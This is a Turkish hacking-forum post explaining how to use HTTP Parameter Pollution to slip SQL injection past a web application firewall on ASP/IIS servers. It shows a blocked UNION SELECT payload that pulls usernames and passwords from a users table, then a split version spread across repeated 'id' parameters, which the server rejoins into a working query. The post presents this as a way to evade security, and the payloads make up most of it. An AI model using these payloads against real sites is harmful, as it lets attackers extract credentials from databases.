SQL Injection HPP WAF bypass

sniffer

Üye
5 Nis 2012
144
0
SQL Injection Saldırılarında HTTP Parameter Pollution (HPP) Zafiyetinden Yararlanarak Güvenlik Duvarını Aşma (HPP WAF bypass)

Bir url üzerinde aynı parametre isminin birden fazla geçmesinin belli bir standardı olmadığından farklı platformlar üzerinde farklı yorumlanmasına sebep olmaktadır.

Bazı Sunuculara göre HPP Yorumlaması




Buradan bir örnekle güvelik duvarını nasıl aşacağımızdan bahsedelim.

Örneğin ASP/IIS Sunucusunu ele alalım.

Kod:
localhost/?id=1 union select username,password from users--
şeklinde bir sorgu yaptığımız zaman güvenlik sisteminin bu saldırıya izin vermediğini düşünelim.

Yukarıdaki tabloda IIS sunucuda birden fazla aynı parametreyi yolladığımızda yollanan parametre değerleri arasına virgül koyduktan sonra birleştirip işlediğini görüyoruz.

Örneğin sorguyu bu hale getirdiğimizi düşünelim.
Kod:
localhost/?id=1 union/*&id=*/select/*&id=*/username&id=password/*&id=*/from users--
Sunucu browserdan aldığı bu url'yi sorgu içinde şu şekilde işleyecektir.
Kod:
1 union/*,*/select/*,*/username,password/*,*/from users--
Yukarıda gördüğümüz şekilde sorgumuzu güvenliğe yakalanmadan işletmiş olduk. Tabi ki sorguyu yollama şekli arttırılıp çeşitlendirilebilir. Replace fonksiyonlarının mantığına göre farklı yöntemler üretilebilir.

Not: Alıntıdır kaynak:
Kod:
http://www.kingoseo.com/2013/07/hpp-waf-bypass-sql-injection.html
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.